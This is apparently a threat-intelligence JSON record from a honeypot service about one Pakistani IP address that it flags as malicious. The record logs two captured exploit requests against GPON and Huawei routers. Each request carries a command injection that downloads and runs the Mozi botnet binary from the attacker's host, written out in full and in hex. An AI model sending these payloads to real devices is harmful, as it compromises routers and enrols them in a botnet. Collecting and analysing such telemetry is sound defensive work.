{"ip":"103.186.77.70","total_events":2,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"2 loader / command-injection payload(s)","confidence":"medium","network_type":"residential ISP","why":["2 request(s) carried a loader or command-injection payload (wget, curl, tftp, busybox, chmod or a known bot name).","This is the same evidence that puts an address in the public exploiter feed, so the feed and this page now agree.","Payload evidence stands on its own: one request that fetches a botnet binary is exploitation, not probing.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"1,130 bytes sent","bytes_sent":1130,"session_seconds":0,"persistent":false}},"first_seen":"2026-08-03T08:22:02","last_seen":"2026-08-28T04:44:18","events_24h":0,"events_7d":0,"geo":{"country_code":"PK","country_name":"Pakistan","region":"","city":"","lat":30.0,"lon":70.0,"asn":142647,"org":"Nasstec Airnet Networks Private Limited"},"source_domain":"186-77-70.nasstecairnet.net.pk","known_scanners":[],"scanner_tag":{"key":"peeringdb:as142647","label":"Nasstec Airnet","category":"isp","url":"https://www.peeringdb.com/asn/142647"},"cve_matches":[{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"}],"malware":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1},{"port":37215,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0600_1386cd485c90","po11nn0400_829cc7acbb47"]},"fingerprint_peers":{"po11nn0600_1386cd485c90":52,"po11nn0400_829cc7acbb47":23},"user_agents":["Hello, World"],"timeline":[{"date":"2026-08-03","count":1},{"date":"2026-08-28","count":1}],"recent_events":[{"timestamp":"2026-08-28T04:44:18","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:80\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://103.186.77.70:50625/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a38300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f3130332e3138362e37372e37303a35303632352f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e38303b73682b2f746d702f67706f6e3830266970763d30","method":"POST","user_agent":"Hello, World","ja3":"","session":"22d8bec7-8eed-4069-a29c-df6143b3853d","seq":1,"duration_ms":100,"bytes_in":319,"bytes_out":78},{"timestamp":"2026-08-03T08:22:02","port":37215,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Digest username=\\\"dslf-config\\\", realm=\\\"HuaweiHomeGateway\\\", nonce=\\\"88645cefb1f9ede0e336e3569d75ee30\\\", uri=\\\"/ctrlt/DeviceUpgrade_1\\\", response=\\\"3612f843a42db38f48f59d2a3597e19c\\\", algorithm=\\\"MD5\\\", qop=\\\"auth\\\", nc=00000001, cnonce=\\\"248d1a2560100669\\\"\",\"connection\":\"keep-alive\",\"content-length\":\"601\",\"host\":\"<HONEYPOT>:37215\"}","body":"<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 103.186.77.70:42788 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/ctrlt/DeviceUpgrade_1","summary":"","payload_hex":"504f5354202f6374726c742f446576696365557067726164655f3120485454502f312e310d0a486f73743a20<HONEYPOT>3a33373231350d0a436f6e74656e742d4c656e6774683a203630310d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a417574686f72697a6174696f6e3a2044696765737420757365726e616d653d2264736c662d636f6e666967222c207265616c6d3d22487561776569486f6d6547617465776179222c206e6f6e63653d223838363435636566623166396564653065333336653335363964373565653330222c207572693d222f6374726c742f446576696365557067726164655f31222c20726573706f6e73653d223336313266383433613432646233386634386635396432613335393765313963222c20616c676f726974686d3d224d4435222c20716f703d2261757468222c206e633d30303030303030312c20636e6f6e63653d2232343864316132353630313030363639220d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c733a426f64793e3c753a5570677261646520786d6c6e733a753d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e505050436f6e6e656374696f6e3a31223e3c4e657753746174757355524c3e24282f62696e2f62757379626f782077676574202d67203130332e3138362e37372e37303a3432373838202d6c202f746d702f687561776569202d72202f4d6f7a692e6d3b63686d6f64202d78206875617765693b2f746d702f68756177656920687561776569293c2f4e657753746174757355524c3e3c4e6577446f776e6c6f616455524c3e24286563686f2048554157454955504e50293c2f4e6577446f776e6c6f616455524c3e3c2f753a557067726164653e3c2f733a426f64793e3c2f733a456e76656c6f70653e","method":"POST","user_agent":"","ja3":"","session":"36a8fc14-03fd-4a70-a5ed-3358d392093b","seq":1,"duration_ms":101,"bytes_in":811,"bytes_out":78}],"http_methods":[{"method":"POST","count":2}],"distinct_ports_total":2,"top_paths":[{"path":"/ctrlt/DeviceUpgrade_1","count":1,"ports":1},{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:80","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":2,"events_with_headers":2},"tags":[{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]}],"data_as_of":"2026-09-12T04:34:35.332790+00:00"}